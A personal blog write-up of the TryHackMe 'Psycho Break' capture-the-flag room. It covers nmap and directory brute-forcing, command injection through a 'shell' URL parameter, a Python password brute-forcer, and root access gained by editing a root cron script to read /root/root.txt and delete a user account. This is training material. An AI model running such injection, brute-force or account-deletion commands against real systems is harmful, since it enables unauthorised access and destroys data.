TryHackMe: Psycho Break

This is the my first time joining the hacking game. To be honest, it quite fun actually and learn a lot from this game even though it takes 16 hours to complete. LOL

Link to room : https://tryhackme.com/room/psychobreak
Level: Easy

So, lets get started

Recon

# nmap 10.10.X.X
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 09:18 +08
Nmap scan report for 10.10.X.X
Host is up (0.21s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 29.40 seconds

Now, which OS the target machine is running? lets find out

# nmap -A -Pn -T4 10.10.X.X
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 09:27 +08
Nmap scan report for 10.10.X.X
Host is up (0.20s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 44:2f:fb:3b:f3:95:c3:c6:df:31:d6:e0:9e:99:92:42 (RSA)
| 256 92:24:36:91:7a:db:62:d2:b9:bb:43:eb:58:9b:50:14 (ECDSA)
|_ 256 34:04:df:13:54:21:8d:37:7f:f8:0a:65:93:47:75:d0 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome To Becon Mental Hospital
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.16 seconds

Done. So, now I know all the info about the machine.

The Web

The task is to find the key and access the locker room. Hmmm..

There is a hint in the source code. Let dig into it.

Alright, found the key. There is a timer to enter the locker room. Need to be hurry.

There is another blocker. I need to decode this piece of text “Tizmg_nv_zxxvhh_gl_gsv_nzk_kovzhv” and get the key to access the map. It kind of cipher type like Caesar cipher but its not. So I’m thinking using online cipher detector. Its actually Atbash Cipher. So now, I managed to decode it and lets open the map

No 1 and 2 is completed. Now lets see No 3: Safe Heaven

Safe Heaven room shows nothing and Room No 4 is locked. Its need the keeper key. Then, must be something here. The same method use I inspect the page first

The hint ask to search through out this page. Must be hidden directory. I start digging using gobuster and dirb at the same time to brute all the directory

# gobuster -w WORDLIST_PATH -u http://10.10.X.X/SafeHeaven/ -t 100
# dirb http://10.10.X.X/SafeHeaven/ WORDLIST_PATH

By using dirbuster brute directory wordlist, I manage to find the hidden page

So, proceed~~

This page shows up and need to be fast. Need to find where is exactly is this place

There is a hint in the code. Need to use google image and found it.

The keeper key is revealed. Now, can proceed to the room 4: Abandoned Room

Okay.. Creepy ass room over here. Lets go further then

Oh Sh*t, another race against time (The timer can be reset if you refresh the page) . Inspect page to see any hint.

The hint tell there is something called “shell” in the current page. There is no input at all. So, I’m guessing it is some parameter to be pass at the url. I go for LFI attack.

http://URL?shell=ls

It actually give the list of files. After several attempt, finally get the hidden directory

There is 3 files from the LFI. Replace the url with the first directory found

Tada~~. There is some files showing in directory listing.

Help Me

# wget URL_PATH
# unzip helpme.zip
helpme.txt Table.jpg

I find out that Table.jpg cannot be preview. Must be wrong extension. I simply run file .

# file Table.jpg
Table.jpg: Zip archive data, at least v2.0 to extract

Luckily, clearly stated that it is ZIP file. Extract it

# unzip Table.jpg
key.wav Joseph_Oda.jpg

When hear the key.wav, it kind of morse code because of “bip bip” sound. So, using online morse code decorder and get the key. After a while, the key is actually show the hint and need to reveal something. There is only 2 files from the Table.jpg. There must be something hidden from the Jopesh_Oda.jpg image. So I tried online steganographic decoder and its working.

The message show the credentials to FTP site. Hmm.. interesting..

Crack it Open

# file program
program: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=294d1f19a085a730da19a6c55788ec08c2187039, stripped

Oh! its executable file. Let’s run it

# ./program
[+] Usage
./program <word>

Hmm.. so the program need 1 parameter.

# ./program hello
hello => Incorrect

Okay, now I now how its work. Need to use the dictionary file given and brute it. Let’s create a simple code using python

import os
import sys
import subprocess
with open(DICTIONARY_PATH) as lines:
for password in lines:
output= subprocess.check_output(["./program", password.strip()])
output=output.decode(sys.stdout.encoding).strip()
if "incorrect" in output.lower():
print(password.strip()+" is Wrong")
else:
print(output)
break

Lets run it

python3 program.py

The output

00000 is Wrong
....
....
....
####### => Correct
Decode this => 55 444 3 6 2 66 7777 7 2 7777 7777 9 666 777 3 444 7777 7777 666 7777 8 777 2 66 4 33

Another cipher. Cipher detector also didn’t able to detect what cipher it is. So need to guess is the last choice.

You know what.. This code is take longer than the first one. Haha.. Its actually keypad phone. “abc — def — ghi — jkl — mno — pqrs — tuv — wxyz” dammit.

Go Capture the flag

At first, I tried to brute force the server using hydra. It takes hours but failed using 2 different password dictionary. I tried using previous found key as a username and using the decrypted cipher as password

# ssh USERNAME@10.10.X.X

Yay! Success. The first thing I usually do is list all files from the current directory first.

# ls -al
... -rw-rw-r-- 1 kidman kidman 264 Aug 13 2020 .readThis.txt -rw-r--r-- 1 root root 19 Feb 26 16:36 .the_eye.txt -rw-rw-r-- 1 kidman kidman 33 Jul 13 2020 user.txt
....

Lets see the user.txt.

# cat user.txt
4C72A4EF8EXXXXXXXXXXXX1C4254

When open the .readThis.txt , its encrypted but must be a cipher family also. But still don’t know what cipher it used. So I unable to decode it. Hmmm.. But there is something is going on with .the_eye.txt. I notice that the content is changing after several minutes. First thing in my mind is must be the cron scheduler.

# crontab -e

But nothing is found. So, ineed to brute all the files in the machine to find which file change the .the_eye.txt content

# grep -rs "the_eye" /

And found it. Its a python file with root. Since I don’t know how to reserve shell, I do traditional way. Edit the python file — run command and write to a file to be read

..
subprocess.call("ls -al /root > root_list_files.txt", shell=True)
..

Oh.. there is root.txt in it. So..

subprocess.call("cat /root/root.txt > root.txt", shell=True)

Now root.txt is revealed

# cat /root.txt
BA33BDXXXXXXXXXXXXXXXXXXXX13F3361E

Lastly, need to delete ruvik. Same process, edit the python file again

subprocess.call("deluser -r ruvik && killall -u ruvik && userdel -f ruvik", shell=True)

Oh yeah~~ We are complete the mission!

Software Engineer at Teratotech.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store